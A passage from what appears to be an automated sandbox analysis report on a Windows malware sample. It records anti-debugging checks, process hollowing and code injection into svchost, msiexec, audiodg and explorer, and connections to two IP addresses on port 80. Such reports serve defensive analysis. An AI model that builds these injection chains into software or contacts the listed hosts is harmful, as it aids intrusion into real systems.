                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007D66E2 mov eax, dword ptr fs:[00000030h]20_2_007D66E2
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_6971B881 mov eax, dword ptr fs:[00000030h]29_2_6971B881
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_6971A254 mov eax, dword ptr fs:[00000030h]29_2_6971A254
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E381CDC InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF79E381CDC
                              Source: C:\Windows\System32\svchost.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\explorer.exeCode function: 4_2_09850350 SetUnhandledExceptionFilter,4_2_09850350
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69001BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF69001BBC0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69001C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF69001C44C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69001C62C SetUnhandledExceptionFilter,11_2_00007FF69001C62C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690029924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF690029924
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69001BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF69001BBC0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69001C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF69001C44C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69001C62C SetUnhandledExceptionFilter,16_2_00007FF69001C62C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690029924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF690029924
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8370F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF8B8370F20
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B834A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF8B834A184
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB65054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF8BFB65054
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB64A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF8BFB64A34
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF8BFB76810
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF8BFB75DF8
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB769F8 SetUnhandledExceptionFilter,16_2_00007FF8BFB769F8
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF8BFB9D414
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006BA895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_006BA895
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006BA9F8 SetUnhandledExceptionFilter,18_2_006BA9F8
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006BF25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_006BF25D
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006B9FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_006B9FA8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007CF25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_007CF25D
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007CA895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_007CA895
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007CA9F8 SetUnhandledExceptionFilter,19_2_007CA9F8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007C9FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_007C9FA8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007CA895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_007CA895
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007CA9F8 SetUnhandledExceptionFilter,20_2_007CA9F8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007CF25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_007CF25D
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007C9FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_007C9FA8
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_69719820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_69719820
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_69716B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_69716B1A
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_69717288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_69717288
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Windows\explorer.exeFile created: CC11.tmp.ctx.exe.4.drJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and writeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and write
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 protect: page execute and read and write
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E382048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF79E382048
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E382CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,0_2_00007FF79E382CB8
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,1_2_00007FF7E52B2CB8
                              Source: C:\Windows\explorer.exeCode function: 4_2_09823100 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,4_2_09823100
                              Source: C:\Windows\explorer.exeCode function: 4_2_09824200 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,4_2_09824200
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743D2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,6_2_00007FF6743D2CB8
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,8_2_00007FF7A91B2CB8
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179D2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,9_2_00007FF7179D2CB8
                              Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 333AA10Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeNtUnmapViewOfSection: Indirect: 0x7FF79E3823DCJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeNtUnmapViewOfSection: Indirect: 0x7FF6743D23DCJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeNtUnmapViewOfSection: Indirect: 0x7FF64D7723DC
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeNtUnmapViewOfSection: Indirect: 0x7FF7F75423DC
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 3320000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5A
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000 value starts with: 4D5A
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A
                              Source: C:\Windows\System32\svchost.exeMemory written: PID: 1028 base: 3320000 value: 4DJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeThread register set: target process: 2888Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeThread register set: target process: 4204Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeThread register set: target process: 2656Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeThread register set: target process: 5576Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeThread register set: target process: 2228Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeThread register set: target process: 5304Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeThread register set: target process: 6572Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeThread register set: target process: 6596Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeThread register set: target process: 5840Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeThread register set: target process: 5596
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeThread register set: target process: 6616
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeThread register set: target process: 5608
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeThread register set: target process: 3228
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeThread register set: target process: 5012
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeThread register set: target process: 6632
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7179D0000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\svchost.exe base: 1C0FA27010Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\audiodg.exe base: 656849B010Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000Jump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeMemory written: C:\Windows\System32\msiexec.exe base: 6416BE010Jump to behavior
                              Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 3320000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\svchost.exe base: 2B593CE010Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: C44452B010Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\audiodg.exe base: 6463CB0010Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000Jump to behavior
